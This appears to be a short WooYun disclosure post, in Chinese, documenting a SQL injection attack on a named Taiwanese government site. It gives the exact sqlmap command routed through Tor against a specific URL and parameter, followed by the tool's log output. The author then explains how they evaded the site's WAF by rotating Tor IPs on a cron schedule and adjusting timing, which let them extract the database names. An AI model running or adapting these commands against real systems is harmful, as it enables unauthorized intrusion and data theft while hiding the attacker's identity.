WooYun.org

./sqlmap.py --tor --tor-type=SOCKS5 --random-agent --time-sec=600 --threads 1 -u "http://www.trmc.aec.gov.tw/utf8/big5/keyword.php?KID=14" -p KID --dbs

感觉这个系统已经有WAF了,因为我收获了很多类似下面的错误.
[12:29:11] [INFO] fetching database names
[12:29:11] [INFO] fetching number of databases
[12:29:11] [INFO] retrieved: 4
[12:29:22] [INFO] retrieving the length of query output
[12:29:21] [INFO] retrieved:
[12:29:52] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[12:30:25] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[12:30:56] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[12:31:28] [CRITICAL] connection timed out to the target URL or proxy
[*] shutting down at 12:31:28
还好我像猪猪侠哥哥学习,每5分钟刷新一次Tor的IP地址.并且后来把--threads降低到1,并且加大--time-sec到600,后来就能刷出DB的数据库名了
/home/py/myscripts# crontab -l |grep -v ^#
5,15,25,35,45,55 * * * * /home/py/Tor/renew.py
但是我觉得要拿更多的数据真的会很费劲